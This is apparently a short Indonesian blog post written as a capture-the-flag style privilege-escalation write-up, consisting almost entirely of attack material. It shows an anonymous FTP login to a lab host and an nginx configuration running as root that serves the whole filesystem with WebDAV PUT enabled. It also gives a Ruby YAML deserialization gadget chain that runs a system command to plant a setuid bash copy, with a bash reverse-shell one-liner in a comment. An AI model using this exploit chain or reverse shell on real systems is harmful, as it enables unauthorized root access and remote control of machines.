The First
Mungkin ini akan berguna (just maybe, okay)
Selamat Datang Cuy!!
ini post-an pertama saya, K1zuko. Setel ini dulu biar bacanya semakin santai
Privilege Escalation
ftp
1
2
3
4
5
6
7
8
❯ ftp 10.129.137.216
Connected to 10.129.137.216.
220 (vsFTPd 3.0.3)
Name (10.129.137.216:kizuko): anonymous
331 Please specify the password.
Password:
230 Login successful.
nginx.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1338;
root /;
autoindex on;
dav_methods PUT; # with dav_methods
}
}
Ruby
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: cp /bin/bash /tmp/kz; chmod 6777 /tmp/kz # "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
method_id: :resolve
This post is licensed under CC BY 4.0 by the author.